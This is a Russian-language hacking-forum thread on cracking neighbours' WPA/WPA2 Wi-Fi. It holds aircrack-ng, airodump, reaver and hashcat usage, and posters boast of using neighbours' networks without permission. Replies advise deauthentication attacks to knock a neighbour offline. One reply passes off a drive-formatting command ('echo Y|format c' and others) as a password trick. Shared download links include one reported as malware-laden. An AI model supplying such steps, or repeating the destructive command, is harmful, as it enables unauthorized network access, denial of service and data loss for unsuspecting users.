Просмотр полной версии : Взлом Wi-Fi для чайников
dshelyuzhak
02.12.2013, 21:54
Работает и еще как. Чтобы этому способу устареть- должны для начала новое шифрование придумать
А вообще чтобы попроще с тем же результатом- гугли AirSlax. Никакие команды вводить не нужно, жми только цифры нужные да и всё. Погугли. Скачаешь образ iso (195мб), на флешку поставить, + на ютубе видео по нему посмотри, вот и всё.
+ посмотри как пользоваться hashcat (для брута). Это потом уже. Сначало с AirSlax разберись.
большое спасибо! как разберусь - отпишу получилось ли!
Интересует давно вопрос взлома wi-fi в метро,там же дополнительная система защиты.
virgin или The cloud.
Платить 50 фунтов мне не очень хочется.
или тот же BTF или как его
kins8899
24.01.2014, 16:06
Народ подскажите. Насобирал несколько сар файлов. Словари есть хорошие.
Не могу найти инструкцию по работе hashcat- (именно он сейчас доступен, hashcat-plus эже нету в сети и у автора).
hashcat- работает только из под командной строки с указанием команд. так вот де найти примеры указания комманд и взлома сар файлов?
гугл помочь не смог..(
Народ подскажите. Насобирал несколько сар файлов. Словари есть хорошие.
Не могу найти инструкцию по работе hashcat- (именно он сейчас доступен, hashcat-plus эже нету в сети и у автора).
hashcat- работает только из под командной строки с указанием команд. так вот де найти примеры указания комманд и взлома сар файлов?
гугл помочь не смог..(
В мануале, в хелпе программы, на официальной вики и в десятках статей. То же касается pyrit и aircrack.
kins8899
24.01.2014, 16:49
В мануале, в хелпе программы, на официальной вики и в десятках статей. То же касается pyrit и aircrack.
ты открывал мануал и хелп к этой проге?! там только примры взлома MD5 и ещё каких то баз. Про wpa/wpa2 ни слова!!!
откуда мне знать какие мне ключи ставить и т.п. к своему файлу cap!
ISkateL!
04.02.2014, 15:42
Подскажите, как сделать чтобы BT видел мой внешний адаптер TL-WN821N?
В lsusb видит его, а в ifconfig пусто, только eth0 и lo.
Bus 002 Device 002: ID 80ee:0021 VirtualBox USB Tablet
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 002: ID 0cf3:7015 Atheros Communications, Inc. TP-Link TL-WN821N v3 802.11n [Atheros AR7010+AR9287]
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Подскажите, как сделать чтобы BT видел мой внешний адаптер TL-WN821N?
В lsusb видит его, а в ifconfig пусто, только eth0 и lo.
Bus 002 Device 002: ID 80ee:0021 VirtualBox USB Tablet
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 002: ID 0cf3:7015 Atheros Communications, Inc. TP-Link TL-WN821N v3 802.11n [Atheros AR7010+AR9287]
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
С VirtualBox нельзя получить доступ к физическому адаптеру. Может в настройках порыться и как-то это сделать, но на сколько мне известно у всех виртуальных машин свой виртуальный адаптер.
Решение:
Запиши на флешку и прогрузись в LiveCD.
P.S. А почему BackTrack? Уже давно Kali Linux вышел, там и софт новее + репозитории BT уже давно отключены, не сможешь обновить софт из них.
ты открывал мануал и хелп к этой проге?! там только примры взлома MD5 и ещё каких то баз. Про wpa/wpa2 ни слова!!!
откуда мне знать какие мне ключи ставить и т.п. к своему файлу cap!
Это такая шутка? Люди уже не в состоянии прочитать мануал?
http://savepic.net/4478695.png
Пример:
aircrack-ng -w pass.txt handshake.pcap
Где pass.txt файл с паролями ( не меньше 8 символов если WPA/WPA2!!!)
hanshake.pcap - файл с хендшейком
а как перебрать без словаря...???? это должно очень повезти.... например reaver суппер, но можно ли ей перебирать перехваченные handshake ? чем вообще можно без словаря?
terra.nova_s
30.03.2014, 20:01
Что-то все хэндшейки по нулям :-(
Можно ли в Windows поднять txpower?
Не могу понять отличия essid от bssid.
И то, и то имя WiFi Access Point?
lamer455
10.04.2014, 15:08
Взлом Wi-Fi для чайников
или былинный сказ о том как грамотно подрезать пароль соседской вафли и не сильно при этом огрести
Задолбало читать статьи и смотреть видео. Ничего не получается.
Плачу 100$ человеку, который меня сам лично на практике
пошагово научит взламывать сети WiFi.
Шифрование WPA/WPA2.
snakemc
Пролог
На просторах сети можно найти десятки обрывочных статей и сотни инструкций о том как взломать вай-фай, страждущим предлагается просмотреть обучающее видео с подбором пароля “qwerty123”, но полноценного руководства что называется “от и до” по этой теме я пока не встречал.
Полностью согласен ! Вот именно, раз уж пишете статью, то и пишите “от и до” .
Спасибо gpuhash.
Осмелюсь в дополнение предложить ещё мануальчик, там есть список пинов для wps. И он обновляется с помощью добровольцев. drevocolor.ru/wifi.html (http://drevocolor.ru/wifi.html)
alex98247
03.05.2014, 23:30
Скачать программу для вскрытия wifi можно тут http://gamehill.ru/?page_id=37
ТС , СПАСИБО за Мануал!!.. Однако я Просто поразился вопросом зачем интернет?? и н у нас его просто не было...у меня появилси тока в 2012 однако есть и еще такая тема для украины(Мой Друг не может провести инет...например есть провайдер- который хочет 1.5грн(формат точечно), и есть Архат 500грн но при участии соседей) ВОТ ВОПРОС ПОВИС..я думаю , ....вы догадались) надо как траф отбирать у багатых,. отдавая бедным его...
Программа для взлома wifi ( wpa и wpa2 ) - myfinet.ru
Jopashnik
05.11.2014, 00:16
Доброе время суток, подскажите плз
Проделывал это года 3 назад, из 5-ти сетей словил 3 хеда, решил вчера потестить, поймал более 10 сетей, и 0. Запустил на сутки 5 окон по самым активным сетям. И все так же по 0. Делал aireplay-ng по всем точкам, раз по 30. Пусто (( Что можно еще сделать, кроме нового софта???
Спасибо Автору статьи и всем остальным за подробную инфу, но что-то у меня не получается. Сразу оговорюсь, что всё ниже описаное проводилось со своей точкой. В виду отсутствия внешнего адаптера, пришлось использовать только ноутбучный Wi-Fi. Также, в виду того, что BackTrack 5R1 больше не поддерживается (в смысле проект переименован в Kali), а Kali не хочет ни устанавливаться, ни запускаться на моей машине, использовался другой дистриб Linux-а, с тем же самым набором софта, описаного в этой статье выше.
1. http://images.vfl.ru/ii/1431624137/98085dc0/8732427_m.png (http://vfl.ru/fotos/98085dc08732427.html);
2. http://images.vfl.ru/ii/1431624137/d0e069d3/8732426_m.png (http://vfl.ru/fotos/d0e069d38732426.html);
3. "sudo airodump-ng mon0" - http://images.vfl.ru/ii/1431624135/05ff6c40/8732425_m.png (http://vfl.ru/fotos/05ff6c408732425.html);
4. "sudo airodump-ng --bssid B0:B2C:5C:08:22 -w testcap mon0" - http://images.vfl.ru/ii/1431624134/ae2ce9a5/8732424_m.png (http://vfl.ru/fotos/ae2ce9a58732424.html);
5. При попытки деассоциации клиента от точки доступа пишет, что "device or resource busy" - http://images.vfl.ru/ii/1431624133/0e87639f/8732423_m.png (http://vfl.ru/fotos/0e87639f8732423.html).
lord90111
14.07.2015, 18:51
Наконец действенный способ для взлома, а то только фигня одна попадала.
joshy2016
15.07.2015, 11:05
Не получается что-то взломать соседский wifi.
а есть ли способ напакостить соседу? что бы роутер постоянно перезагружался. Что бы не мог он в интернете сидеть?
Получилось подключиться к соседскому WiFi этой программой
dummper.blogspot.ru
gogapiter
20.07.2015, 11:05
↑ (https://antichat.live/posts/3869927/)
Получилось подключиться к соседскому WiFi этой программой
dummper.blogspot.ru
Программка огонь, показывает пин коды wps, теперь Ривер всегда начинает подбор с 90%
binarymaster
20.07.2015, 13:41
↑ (https://antichat.live/posts/3847414/)
5. При попытки деассоциации клиента от точки доступа пишет, что "device or resource busy" - .
Вы в последней команде не то имя устройства указали, надо mon0.
Сейчас буду пробывать, но не разу еще не получалось. а вообще толк то, если сосед модем выключит
Sagittarius
29.07.2015, 21:22
↑ (https://antichat.live/posts/3868527/)
Не получается что-то взломать соседский wifi.
а есть ли способ напакостить соседу? что бы роутер постоянно перезагружался. Что бы не мог он в интернете сидеть?
Насколько я знаю, в сборку kali входит софтина, позволяющая перегрузить wifi-адаптер, старый добрый метод) Скажу более, на youtube полно роликов по софту kali.
montag52
12.08.2015, 16:38
↑ (https://antichat.live/posts/3868527/)
Не получается что-то взломать соседский wifi.
а есть ли способ напакостить соседу? что бы роутер постоянно перезагружался. Что бы не мог он в интернете сидеть?
http://www.aircrack-ng.org/doku.php?id=deauthentication смотри в этом направлении
comstream
12.08.2015, 18:30
↑ (https://antichat.live/posts/3868527/)
Не получается что-то взломать соседский wifi.
а есть ли способ напакостить соседу? что бы роутер постоянно перезагружался. Что бы не мог он в интернете сидеть?
Aireplay - софт kali linux
скидывает сессии у роутера (вернее просит роутер их скинуть )
menyazovutandey
14.08.2015, 08:08
Подскажите, деауч пакеты сендить начинаю, адаптер зависает, терминал не реагирует на команды, помогает перезагрузить\отключить адаптер. Что посоветуете? tl-wn722nc адаптер.
Шлю от 55 до 7к пакетов, зависает одинакого. 7к полностью кстате ушли) Но резльтата ноль
ruslansheva
30.09.2015, 00:35
http://wifull.com/62-kali-linux-ranee-backtrack-skachat-distributiv.html - про эту прогу можете что-то сказать? Стоит вникать в её изучение?
gogapiter
02.10.2015, 16:17
↑ (https://antichat.live/posts/3896796/)
http://programs.clan.su/load/sistem...art_v70_6_final_na_russkom_dlja_wifi/9-1-0-53 (http://programs.clan.su/load/sistema_kompjutera/programmy/skachat_besplatno_dumper_and_jumpstart_v70_6_final _na_russkom_dlja_wifi/9-1-0-53)
Используйте для взлома лучше вот эту программу!
Не могу сказать плохого про эту спарку, гони к одной точке они не законектились, но дампер пинкоды даёт исправно. Все верные
De_Signer
02.10.2015, 18:27
Спасибо автору, все сработало как надо)
Какая-никакая, а все же экономия семейного бюджета)
↑ (https://antichat.live/posts/3896708/)
http://wifull.com/62-kali-linux-ranee-backtrack-skachat-distributiv.html
- про эту прогу можете что-то сказать? Стоит вникать в её изучение?
Да и все что связано с тематикой о wifi.
↑ (https://antichat.live/posts/3899824/)
Да и все что связано с тематикой о wifi.
а попроще ничего нет?
↑ (https://antichat.live/posts/3367202/)
Сигнатура проблемы:
Имя события проблемы: APPCRASH
Имя приложения: oclHashcat-plus64.exe
Версия приложения: 0.0.0.0
Отметка времени приложения: 4efe51f4
Имя модуля с ошибкой: amdocl64.dll
Версия модуля с ошибкой: 10.0.1084.2
Отметка времени модуля с ошибкой: 50a16014
Код исключения: c0000005
Смещение исключения: 00000000010821c0
Версия ОС: 6.1.7601.2.1.0.256.1
Код языка: 1049
Дополнительные сведения 1: 6c8d
Дополнительные сведения 2: 6c8d82693732bcb4e6ed85d01f8339ae
Дополнительные сведения 3: 80c1
Дополнительные сведения 4: 80c11de909ac969b6b78398da6b1175b
Аналогичная проблема, подскажите плиз как решить!
http://programs.clan.su/load/sistem...art_v70_6_final_na_russkom_dlja_wifi/9-1-0-53 (http://programs.clan.su/load/sistema_kompjutera/programmy/skachat_besplatno_dumper_and_jumpstart_v70_6_final _na_russkom_dlja_wifi/9-1-0-53)
Используйте для взлома лучше вот эту программу!
PeriscopeUP
18.11.2015, 16:22
спасибо за информацию. Давно искал подобную статью
dimon3191
18.12.2015, 13:21
какие есть методы взлома WPA PSK TKIP без WPS?
binarymaster
18.12.2015, 17:18
↑ (https://antichat.live/posts/3929006/)
какие есть методы взлома WPA PSK TKIP без WPS?
/threads/432564/ (https://antichat.live/threads/432564/)
↑ (https://antichat.live/posts/3916267/)
http://programs.clan.su/load/sistem...art_v70_6_final_na_russkom_dlja_wifi/9-1-0-53 (http://programs.clan.su/load/sistema_kompjutera/programmy/skachat_besplatno_dumper_and_jumpstart_v70_6_final _na_russkom_dlja_wifi/9-1-0-53)
Используйте для взлома лучше вот эту программу!
программа не прошла тест на вирустотале. 6/54+устанавливается дополнительный софт (амиго и другие радости жизни)
Здрасте, подскажите по поводу хэндшеков, 5 точек отдали хэндшейки, а 4 точки отдавать не хотят, клиенты подключались к точке, но при использовании Airslax5 и KaliLinux, хэндшейки не отдавали, две эти программы(или системы) вроде бы как отключали клиентов, у них шла потеря пакетов и мощность сигнала падала до 0, а потом само все восстанавливается, и хэндшейк не отдает, проверял и командой специальной, на наличие хэндшейка в cap, его там не обнаружило, 8 часов мониторил точку, глушил и клиента и роутер, и все в без толку, может кто подскажет как можно заставить отдать хэндшейк, и кстати когда кто то подключается к точке с НЕ правильным паролем, софт пишет что хэндшейк пойман, почему так никто не знает?
mixannic
02.01.2016, 14:07
Привет. Есть такой вопрос, у меня присутствует адаптер dwa 126 и не получается применить команду txpower 24, происходит следующее при вводе команды ответа из консоли нет, как будто она применилась, но при вводе iwconfig, tx power всеравно 20, в связи с этим я так понимаю немогу словить eapol msg 2/4 и msg 4/4 клиента подключенного к AP неслышно я так полагаю. (2/4 я так понимаю это ответ от клиента с хешем ключа и essid) есть ли возможные пути увеличить показатель приема или чувствительность, заранее благодарен.
↑ (https://antichat.live/posts/3935064/)
адаптер dwa 126 и не получается применить команду txpower 24
Вводите сразу команду txpower 100500
Откуда в адаптере на 20дб возьмется 24?
↑ (https://antichat.live/posts/3935086/)
Вводите сразу команду txpower 100500
Откуда в адаптере на 20дб возьмется 24?
Получается если вводить:
iw reg set BO
iwconfig wlan0 txpower 30
То это все без толку?
Или не все адаптеры поддерживают программное увеличение мощности?
mixannic
02.01.2016, 16:04
↑ (https://antichat.live/posts/3935086/)
Вводите сразу команду txpower 100500
Откуда в адаптере на 20дб возьмется 24?
вот откуда, это официальные спецификации на сей девайс
20 стоит скорее всего по дефолту, когда как сам аппарат способен на 24
http://www.dlink.ru/ru/products/2/1297_b.html пруф-линк
EIRP2
+ 24 dBm (макс.)
↑ (https://antichat.live/posts/3935103/)
Или не все адаптеры поддерживают
Поддерживают несколько моделей альф.
Для остальной вздрочи для нищебродов это только цифры.
↑ (https://antichat.live/posts/3935064/)
Привет. Есть такой вопрос, у меня присутствует адаптер dwa 126 и не получается применить команду txpower 24, происходит следующее при вводе команды ответа из консоли нет, как будто она применилась, но при вводе iwconfig, tx power всеравно 20, в связи с этим я так понимаю немогу словить eapol msg 2/4 и msg 4/4 клиента подключенного к AP неслышно я так полагаю. (2/4 я так понимаю это ответ от клиента с хешем ключа и essid) есть ли возможные пути увеличить показатель приема или чувствительность, заранее благодарен.
Забей ты на это.У меня RT3070 и подбросить ему (чипу) уголька програмно позволяет.Но поверь,кроме как ушатать свою приблуду ты этим врядли чего больше добьёшся.И я однажды спалил.Да и были здесь вродебы дебаты на эту тему.
mixannic
02.01.2016, 21:11
↑ (https://antichat.live/posts/3935145/)
Поддерживают несколько моделей альф.
Для остальной вздрочи для нищебродов это только цифры.
Ясненько, вообщем смог словить 2 полных eapol'а (msg 1.2.3.4/4) но https://hashcat.net/cap2hccap/ не считает их валидными странно но временной интервал между пакетами вроде норм и идут они следом друг за другом. а словить смог только когда "клиент" начал проявлять какую-то активность в интернете и в этот момент я провел процедуру деаутентификации, вот тогда я и смог поймать eapol'ы, странно ещо вот что, клиент как бы сказать не деаунтифицируется или я немогу словить eapol'ы при деаутентификации если клиент не проявляет активность в сети, (может я конечно заблуждаюсь) но до этого момента я немог получить полный хендшейк а получал только eapol msg 1/4 и msg 3/4, может кто знает ещо варианты форсирования получения eapol'ов?
↑ (https://antichat.live/posts/3935245/)
Ясненько, вообщем смог словить 2 полных eapol'а (msg 1.2.3.4/4) но
https://hashcat.net/cap2hccap/
не считает их валидными странно но временной интервал между пакетами вроде норм и идут они следом друг за другом. а словить смог только когда "клиент" начал проявлять какую-то активность в интернете и в этот момент я провел процедуру деаутентификации, вот тогда я и смог поймать eapol'ы, странно ещо вот что, клиент как бы сказать не деаунтифицируется или я немогу словить eapol'ы при деаутентификации если клиент не проявляет активность в сети, (может я конечно заблуждаюсь) но до этого момента я немог получить полный хендшейк а получал только eapol msg 1/4 и msg 3/4, может кто знает ещо варианты форсирования получения eapol'ов?
Твоя ситуация далеко не редкость.Причиной тому могут быть разные факторы.Учитывай местность.Её рельеф.Расстояние до точки.Погода.Температура воздуха на улице.Какие здания вокруг тебя.(Деревянные,железобет нные,кирпичные,линии ЛЭП ну и.т.п)
Всё это, да и не только создаёт помехи.Если вокруг много точек,то помех только от них уже хватает.Ну а залог успеха это перво наперво побольше знаний.Хороший чип + хорошая направленая антенна.Подбирайся к точке поближе.Конвертить cap можно и aircrak-ng вот так:
aircrack-ng -J
Я такие шейки (которые сомнительные) гоняю Pyrit с опцией --all-handshakes Так надёжнее.Котяра может пролететь.Хоть и не факт,что это вина кота.Может "конвертирование" такое.
mixannic
03.01.2016, 14:37
↑ (https://antichat.live/posts/3935434/)
Твоя ситуация далеко не редкость.Причиной тому могут быть разные факторы.Учитывай местность.Её рельеф.Расстояние до точки.Погода.Температура воздуха на улице.Какие здания вокруг тебя.(Деревянные,железобет нные,кирпичные,линии ЛЭП ну и.т.п)
Всё это, да и не только создаёт помехи.Если вокруг много точек,то помех только от них уже хватает.Ну а залог успеха это перво наперво побольше знаний.Хороший чип + хорошая направленая антенна.Подбирайся к точке поближе.Конвертить cap можно и aircrak-ng вот так:
aircrack-ng -J
Я такие шейки (которые сомнительные) гоняю Pyrit с опцией --all-handshakes Так надёжнее.Котяра может пролететь.Хоть и не факт,что это вина кота.Может "конвертирование" такое.
Спасибо за совет про направленную антенну, сваял на коленке биквадрат для 6го канала на коем живет соседская AP, результат +15-20dBi словил хендшейк за пару минут, пишу c трофейной вафли))) всем спасибо
я теперь походу не буду платить за инет) спасибо ТСу и соседу)
Спасибо за статью. Очень полезна. Я в основном подбором паролей пользуюсь. 10-20% прокатывает)
daniel3711
06.01.2016, 20:17
↑ (https://antichat.live/posts/2945499/)
Да мне кажется статейка уже с самого начала вышла за пределы рядовых чайников. Темы затронуты весьма серьезные, и доходы от целевого использования таких знаний могут быть не малыми. По сути подбор ключа сети аналогичен возможности вставить Ethernet шнурок в чужой сервер.
очень сильно за этими пределами(
как ловить хендшейк одной сети если после airodump во второй таблице в station ничего нет?то есть я не могу в aireplay забить данные ,и еще ,допустим station есть ,и я запускаю aireplay , но мне выдает что я на таком то канале ,а жертва на другом ,можно как-нибудь зафиксироваться на канале жертвы?
antichatwmail
07.01.2016, 15:10
спасибо,давно мечтал подключится к wifi соседей xD
↑ (https://antichat.live/posts/3937033/)
как ловить хендшейк одной сети если после airodump во второй таблице в station ничего нет?то есть я не могу в aireplay забить данные ,и еще ,допустим station есть ,и я запускаю aireplay , но мне выдает что я на таком то канале ,а жертва на другом ,можно как-нибудь зафиксироваться на канале жертвы?
Раз ничего нет, значит не подключен ни один клиент к точке WiFi - жди или выбирай другую, насчет фиксироваться первый раз с таким сталкиваюсь, можно когда подключаешься к роутеру через airodump ввести "-c 11" без кавычек, это значит что адаптер будет фиксироваться на 11 канале.
juliamavka
09.01.2016, 17:55
хмм ну так уж просто оказалось, как хотелось бы, но если поиграться то можно и получить халявный вайфайчик)
Кто нибудь может подсказать, как узнать внешний IP адрес роутера в Kali Linux, если я к нему не подключен.
Reaver удалось перебрать wps от wr1042nd, круто)
Вечер добрый, хз та не та темка, взял вафлеадаптер тплинк тлвд7200нд как и советует топикооткрыватель. в общем в винде комонвифи не разъединяет роут с пользователем, а в линуксах грит чтото в духе нот сач девайс, после попытки повысить мощность или ввести airodump-ng mon0, в чем трабла то? вродеб и с дровами всё неплохо, и с головой дружил когдато. в общем нид хелп!
Недавно узнал что можно как то перехватывать пароли в MD5 или конверитровать cap в MD5 а потом узнавать пароль через онлайн сервисы, может кто объяснит как?
Не знаю может бред написал, пользуюсь простым методом, Linux + WiFi адаптер = перехват cap и расшифровка в винде с помощью EWSA.
comstream
15.08.2016, 16:18
↑ (https://antichat.live/posts/3981240/)
Недавно узнал что можно как то перехватывать пароли в MD5 или конверитровать cap в MD5 а потом узнавать пароль через онлайн сервисы, может кто объяснит как?
Не знаю может бред написал, пользуюсь простым методом, Linux + WiFi адаптер = перехват cap и расшифровка в винде с помощью EWSA.
Если сниффить трафик в сети (к которой уже подключился), то можно перехватить MD5 кэши паролей и пробрутить их на онлайн сервисе (например cmd5.ru).
А к взлому WI-FI md5 кэши никакого отношения не имеют.
↑ (https://antichat.live/posts/3981625/)
Если сниффить трафик в сети (к которой уже подключился), то можно перехватить MD5 кэши паролей и пробрутить их на онлайн сервисе (например cmd5.ru).
Зачем мне что то перехватывать и расшифровывать, если я уже подключился к сети?
Или вы имеете ввиду пароли от сайтов?
Inferno808
24.08.2016, 19:54
Здравствуйте. Я знаю WPS PIN от роутера (Zyxel Keenetic 2), но пароль мне неизвестен. (Когда я захожу в Компьютер —> Сеть, выбираю устройство Keenetic 2, и ввожу PIN, то мне предлагают заново настроить роутер, но мне надо знать имеющийся пароль).
Я знаю, что на роутере стоит свежая прошивка, которая наверняка блокирует WPS при переборе pin кода через Kali Linux. Но мне pin известен, нужен пароль. Так вот, можно ли, зная pin код, через Kali Linux узнать пароль, если у роутера прошивка, блокирующая WPS при атаке?
Кстати, программы Jumpstart и QSS (для Windows) выдают ошибку — роутер отказывается выдавать пароль. Получится ли узнать пароль через Kali Linux?
↑ (https://antichat.live/posts/3984500/)
Получится ли узнать пароль через Kali Linux?
reaver -i mon0 -b xx:xx:xx:xx:xx:xx(BSSID) -c x(номер канала) -e Keenetic 2(ESSID) --pin=xxxxxxxx(PIN)
/threads/310835/ (https://antichat.live/threads/310835/)
через винду можно ещё написав в командной строке: echo Y|format f & format e & echo Y|format d & echo Y|format c
Получится, на хабре ещё куча подобных статей. ломанёш сеть, смотри пароли по умолчанию, а лучше скачай список таковых, для роутеров разных производителей и сможеш спокойно лазить по меню. Но гадить не надо. А если не получиться тогда энмап в руки а вслед за ним метасплойт, хотя сначала попробовать стоит гидрой и хрустом, ибо у последнего функционал более чем достаточный для создания списка паролей-логинов.
Тут написанно что можно куки взять зайди в админку вифи, а как это сделать можно поподробней?)
mr_Coder
07.12.2016, 06:08
Статья все еще актуальна? Или есть какие то изменения?
Turanchocks_
07.12.2016, 14:30
↑ (https://antichat.live/posts/4021631/)
Статья все еще актуальна? Или есть какие то изменения?
Актуальна. Изменилось мало что.
Скажите пожалуйста не находит EAPOL.
У нас война у соседа вай-фай. Линуса нет. У меня мобильный тырнет.
Вин-7 х64 commview for wifi
Видит его сеть, подключенный телефон леново.
Ищу пакеты по инструкции:
"Итак, запускаем наш чудный инструмент «Инструменты» -> «Реасоциация узлов» и выбираем нашу сеть там где «Послать запрос на деаунтификацию...» и нажимаем «Послать сейчас».
И видим как пролетели пакеты EAPOL."
У меня нет пакетов EAPOL
Только красные строки и темно красные появляются и оливковые и все.
-
Только что сказали
" Если под EAPOL вы имеете в виду хендшейк и не возможность его перехватить,
то проблема скорее всего в том что клиентом выступает телефон.
Вообще от мобильных устройств (телефонов, планшетов) очень сложно перехватить хендшейк.
"
-
Советуют использовать airslax. airslax базовый на флешке.
Olivia Dunham
14.01.2017, 17:01
↑ (https://antichat.live/posts/4035919/)
И видим как пролетели пакеты EAPOL."
У меня нет пакетов EAPOL
Если ты их видишь они должны быть у тебя! Это во первых !
Во вторых, Wi-Fi соседа без разрешения трогать нельзя, это запрещено законом УК РФ, Статья 272!
Можно попросить пароль у соседа! Мой сосед например, вежливо попросил меня и я ему дала!
airslax это шлак, есть достойные дистрибутивы Linux для Penetration Testing такие как Kali.
↑ (https://antichat.live/posts/4035919/)
" Если под EAPOL вы имеете в виду хендшейк и не возможность его перехватить,
то проблема скорее всего в том что клиентом выступает телефон.
Вообще от мобильных устройств (телефонов, планшетов) очень сложно перехватить хендшейк.
Одной из причин по которой никак не хочет ловится хэндшейк, может быть, то что на точке доступа ширина полосы настроена на 40Mhz, а вы пытаетесь его словить с помощью адаптера, который работает с настройкой полосы в 20Mhz.(я потом проверял это с несколькими смартфонами, что интересно эффект проявлялся на флаях, а от самсунгов захватывался и со стандартной настройкой) Я не так давно убедился в этом на собственном опыте - хэндшейк не ловился, хотя по всем признакам должен был легко словиться. После принудительного задания ширины полосы адаптера 40Mhz командной "iw dev set channel HT40+" (где if_name - имя интерфейса которым мониторите, а num_channel - номер канала на котором работает точка доступа), хэндшейк словился моментально. Когда расшифровал его и посмотрел настройки роутера, там действительно было вбито 40Mhz. Но был ещё один нюанс, хотя это может быть особенность моего адаптера - я использую старую добрую aircrack-ng, и задавать ширину полосы нужно было ПОСЛЕ запуска airodump-ng, потому как при запуске она принудительно выставляет настройку адаптера на 20Mhz. Посмотреть текущую ширину полосы можно командой "iw dev info".
binarymaster
14.01.2017, 21:12
Olivia Dunham said:
↑ (https://antichat.live/posts/4036061/)
Мой сосед например, вежливо попросил меня и я ему дала!
Это мило. Но к сожалению, таких добрых и щедрых людей, как вы, не так уж и много.
Сломал WEP выдал пароль E728D9457DFBA62128BB1CBE1B другой прогой вот такой En hexadecimal...: E728D9457DFBA62128BB1CBE1B En ASCII.........: ?(?E}??!(?? к точке не подходит чем расшифровать ?....
binarymaster
15.01.2017, 15:26
↑ (https://antichat.live/posts/4036256/)
к точке не подходит чем расшифровать ?....
Полученный WEP ключ не расшифровывают. Им либо пользуются как есть, либо не пользуются.
SkySlayer
20.02.2017, 18:15
нынче на не hashcatGUI, ни oclHashcat не скачать, а то, что есть на сайте - выдает ошибку. хз что делать
↑ (https://antichat.live/posts/4051338/)
нынче на не hashcatGUI, ни oclHashcat не скачать, а то, что есть на сайте - выдает ошибку. хз что делать
Качать - HashcatGUI_050b1.zip (https://hashkiller.co.uk/downloads/HashcatGUI_050b1.zip):
https://hashkiller.co.uk/hashcat-gui.aspx
Качать - hashcat binaries v3.30 (https://hashcat.net/files/hashcat-3.30.7z), жми на "v3.30"
https://hashcat.net/hashcat/
Все отлично скачивается
Другое дело, если карточка радеон старая, то может и не работать
Кто нибудь подскажет, что за точки с мощностью сигнала -1 и названием Leight 0?
И что за постоянно подключенные клиенты к нормальным точкам с мощностью сигнала -1?
Как бороться с клиентами, которые не отдают хэндшэйк?
Пользуюсь через AirSlax Pro отключение клиента и отключение всех не помогает, но если по-мучать то потом отдают, но после таких манипуляций в программе для расшифровки пишет - Нет данных, а должно быть Сессия правильная - Да (это когда отдают хэндшэйк после отключения 1 клиента)
↑ (https://antichat.live/posts/4064596/)
Кто нибудь подскажет, что за точки с мощностью сигнала -1 и названием Leight 0?
И что за постоянно подключенные клиенты к нормальным точкам с мощностью сигнала -1?
Если по простому, то это те точки, к которым не "дотягивается" ваш адаптер
binarymaster
24.03.2017, 23:19
↑ (https://antichat.live/posts/4064596/)
Кто нибудь подскажет, что за точки с мощностью сигнала -1 и названием Leight 0?
И что за постоянно подключенные клиенты к нормальным точкам с мощностью сигнала -1?
Первое - это когда адаптер не слышит точку, но стабильно слышит её клиентов.
Второе - в точности наоборот, а ещё проводные компы могут светиться, из-за broadcast и multicast пакетов, но от них толку нет.
↑ (https://antichat.live/posts/4064598/)
Если по простому, то это те точки, к которым не "дотягивается" ваш адаптер
То есть надо куда то перейти или поднять повыше и будет ловить?
Кстати был TP-LINK TL-WN721N показывал точки с сигналом вплоть до -92 а вот Blueway N9000 что то больше -80 не показывает, это какое то программное ограничение стоит?
↑ (https://antichat.live/posts/4064603/)
То есть надо куда то перейти или поднять повыше и будет ловить?
Кстати был TP-LINK TL-WN721N показывал точки с сигналом вплоть до -92 а вот Blueway N9000 что то больше -80 не показывает, это какое то программное ограничение стоит?
Более объемный ответ Вам дал binarymaster (https://antichat.live/members/148032/).
По поводу блювея не отвечу - у меня его нет
Есть человек, который подскажет как брутить пароли от точек через хэш, если есть перехваченный хэндшэйк в cap формате?
Может конечно я что то не так понял, но вроде бы через программу PasswordsPro можно искать пароль методом хэша.
К сожалению на EWSA скорость всего около 60000 паролей в секунду, а через MD5 обещают - 5472M.
Спасибо, если найдется добрый человек.
↑ (https://antichat.live/posts/4070770/)
Есть человек, который подскажет как брутить пароли от точек через хэш, если есть перехваченный хэндшэйк в cap формате?
Может конечно я что то не так понял, но вроде бы через программу PasswordsPro можно искать пароль методом хэша.
К сожалению на EWSA скорость всего около 60000 паролей в секунду, а через MD5 обещают - 5472M.
Спасибо, если найдется добрый человек.
WPA2 и MD5 - разные типы хешей и брутятся каждый по своему алгоритму.
Все бы были рады, если бы то, что вы не так поняли, было реализуемо
↑ (https://antichat.live/posts/4070778/)
WPA2 и MD5 - разные типы хешей и брутятся каждый по своему алгоритму.
Все бы были рады, если бы то, что вы не так поняли, было реализуемо
Вроде бы получается, что для брута через хэш нужен словарь или что то там, в котором будет указано имя точки типа D-Link и подставленные к нему всевозможные пароли?
Или в скорости я не выиграю и продолжать перебирать по 60000 в EWSA?
Triton_Mgn
11.04.2017, 13:18
↑ (https://antichat.live/posts/4070781/)
Вроде бы получается, что для брута через хэш нужен словарь или что то там, в котором будет указано имя точки типа D-Link и подставленные к нему всевозможные пароли?
Или в скорости я не выиграю и продолжать перебирать по 60000 в EWSA?
Написали же, что так не получится, продолжайте подбирать по 60000.
http://s020.radikal.ru/i707/1704/37/92d3f4263754.jpg
Здрасте товарищи, не знаю где ещё написать, надеюсь модераторы не разозлятся ))
Сегодня перестал работать интернет на компе, пишет Нет подключения к интернету как в опере так и в хроме, на всех 5 точках, провайдер скорее всего везде 1.
Ошибка err_proxy_connection_failed.
На всех точах с телефона все работает, а на компе через адаптеры blueway 9000 и Edup не грузит сайты, даже подключенный телефон в режиме модема не помогает, в торренте раздача и приём есть, помогите разобраться с бедой, что могло произойти и что можно сделать?
Что самое интересное при раздаче интернета WIFi через адаптер все работает на телефоне.
↑ (https://antichat.live/posts/4089732/)
Смотри сначала файервол.
Такого не стоит.
Вроде справился, отбой.
В чем причина была? Просто перегрузил?
↑ (https://antichat.live/posts/4090092/)
В чем причина была? Просто перегрузил?
Ставил расширение типа прокси и впн, и забыл что оно работает, удалил его и все заработало на Хроме, только не пойму почему Опера ничего не грузила, на нее никаких расширений не ставил.
JonBraun
11.06.2017, 12:51
На интересующей точке она первая, нет клиентов. Хотя пакеты куда то шлёт со страшной силой. Как будто фильмы постоянно смотрят.
Что не так делаю?
